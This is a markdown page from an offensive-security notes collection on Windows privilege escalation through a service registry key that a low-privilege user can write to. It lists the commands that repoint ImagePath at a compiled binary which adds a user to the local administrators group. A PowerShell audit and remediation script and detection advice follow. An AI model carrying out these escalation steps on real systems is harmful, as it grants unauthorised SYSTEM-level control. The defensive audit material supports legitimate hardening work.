killchain-compendium/exploit/windows/service_escalation/service_escalation.md

# Service Escalation

Privilege escalation through a service whose registry key grants write access to a low-privilege user: the `ImagePath` value is repointed at an attacker-compiled binary and the service is restarted so that the binary runs as SYSTEM.

- Check the permissions on the service's registry key (the current user needs write access to it):

  ```powershell
  Get-Acl -Path hklm:\System\CurrentControlSet\services\regsvc | fl
  ```

- Add the command to the `system()` call inside `service.c`, e.g. add a user to the local administrators group:

  ```
  cmd.exe /k net localgroup administrators user /add
  ```

- Cross-compile with MinGW:

  ```sh
  x86_64-w64-mingw32-gcc service.c -o service.exe
  ```

- Upload the binary to the target, point the service's `ImagePath` at it and start the service:

  ```
  reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND_SZ /d C:\Temp\service.exe /f
  sc start regsvc
  ```
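The single `Get-Acl` check above generalizes to a host-wide audit. The following PowerShell is an added example, not part of the killchain-compendium page: it walks every key under `HKLM:\SYSTEM\CurrentControlSet\Services`, reports ACEs that give low-privilege principals the rights needed to rewrite `ImagePath`, and offers a remediation function that strips such explicit ACEs. The principal list, the function names `Get-WeakServiceKeyAcl` and `Repair-WeakServiceKeyAcl`, and the output fields are this example's own choices; it assumes it is run from an elevated session on the host being audited.

```powershell
# Added example (not from the original page): audit service registry keys for
# ACLs that let low-privilege principals change service configuration.
# Assumes an elevated PowerShell session on the host being audited.

# Principals that should never hold write rights on a service key (assumed list).
$LowPrivPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)

# Registry rights that allow rewriting ImagePath (SetValue) or the whole key.
$WriteRights = [System.Security.AccessControl.RegistryRights]::SetValue -bor
               [System.Security.AccessControl.RegistryRights]::WriteKey -bor
               [System.Security.AccessControl.RegistryRights]::FullControl -bor
               [System.Security.AccessControl.RegistryRights]::ChangePermissions -bor
               [System.Security.AccessControl.RegistryRights]::TakeOwnership

function Get-WeakServiceKeyAcl {
    [CmdletBinding()]
    param([string]$ServicesRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services')

    Get-ChildItem -Path $ServicesRoot -ErrorAction SilentlyContinue | ForEach-Object {
        $key = $_
        # Some keys deny even admins read access to their ACL; skip those.
        try { $acl = Get-Acl -Path $key.PSPath -ErrorAction Stop } catch { return }

        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($LowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (($ace.RegistryRights -band $WriteRights) -eq 0) { continue }

            [pscustomobject]@{
                Service   = $key.PSChildName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                Inherited = $ace.IsInherited
                ImagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath `
                             -ErrorAction SilentlyContinue).ImagePath
            }
        }
    }
}

function Repair-WeakServiceKeyAcl {
    # Removes the explicit Allow ACEs reported by Get-WeakServiceKeyAcl.
    # Supports -WhatIf / -Confirm so findings can be reviewed before any change.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([Parameter(ValueFromPipeline = $true)] $Finding)

    process {
        $path = "HKLM:\SYSTEM\CurrentControlSet\Services\$($Finding.Service)"
        if ($Finding.Inherited) {
            # An inherited ACE cannot be removed here; the parent key is the real problem.
            Write-Warning "$($Finding.Service): ACE is inherited; fix the parent key instead."
            return
        }
        if ($PSCmdlet.ShouldProcess($path, "Remove write ACE for $($Finding.Principal)")) {
            $acl   = Get-Acl -Path $path
            $rules = $acl.Access | Where-Object {
                $_.IdentityReference.Value -eq $Finding.Principal -and
                $_.AccessControlType -eq 'Allow' -and -not $_.IsInherited
            }
            foreach ($rule in $rules) { [void]$acl.RemoveAccessRule($rule) }
            Set-Acl -Path $path -AclObject $acl
        }
    }
}

# Usage: list findings first; remove the offending explicit ACEs only after review.
Get-WeakServiceKeyAcl | Format-Table -AutoSize
# Get-WeakServiceKeyAcl | Repair-WeakServiceKeyAcl -WhatIf
```

The audit deliberately matches on the principal name rather than SID, so localized systems should extend `$LowPrivPrincipals` accordingly. A finding with `Inherited = $true` means the weakness comes from a parent key's ACL and must be fixed there. For detection rather than prevention, a change to a service's `ImagePath` value surfaces as Sysmon Event ID 13 (registry value set) or, with a SACL on the `Services` key, as Security Event ID 4657; a subsequent `ImagePath` that points outside `C:\Windows` or `C:\Program Files` into a user-writable directory such as `C:\Temp` is the signal worth alerting on.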